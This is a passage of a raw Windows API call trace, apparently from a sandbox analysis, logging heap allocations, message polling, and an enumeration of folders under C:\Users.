wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.811] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.811] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.812] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.812] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.812] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.812] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.812] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.812] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.812] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0093.813] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.813] PathFindFileNameW (pszPath="") returned="" [0093.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.813] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.813] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x335e120 [0093.813] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0093.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330018 [0093.813] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330018 | out: hHeap=0x630000) returned 1 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0093.814] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0093.814] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.814] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fba0 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0093.814] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0093.814] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0093.814] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0093.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0093.815] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0093.815] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0093.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x498) returned 0x32d3a08 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330018 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330478 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330540 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330798 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fdc0 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe60 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301d0 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332e8 [0093.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3333208 [0093.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332b0 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330388 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcf8 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33306d0 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe38 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330428 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332feb0 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304a0 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33306f8 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe10 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330658 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307e8 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff50 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330590 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd70 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff78 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304f0 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330838 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330298 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd48 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330720 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302c0 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330860 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fba0 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3340958 | out: hHeap=0x630000) returned 1 [0093.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0093.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0093.817] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0093.817] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.817] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fed8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301f8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330888 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0093.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330748 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5ee0 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.819] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.819] RtlAllocateHeap 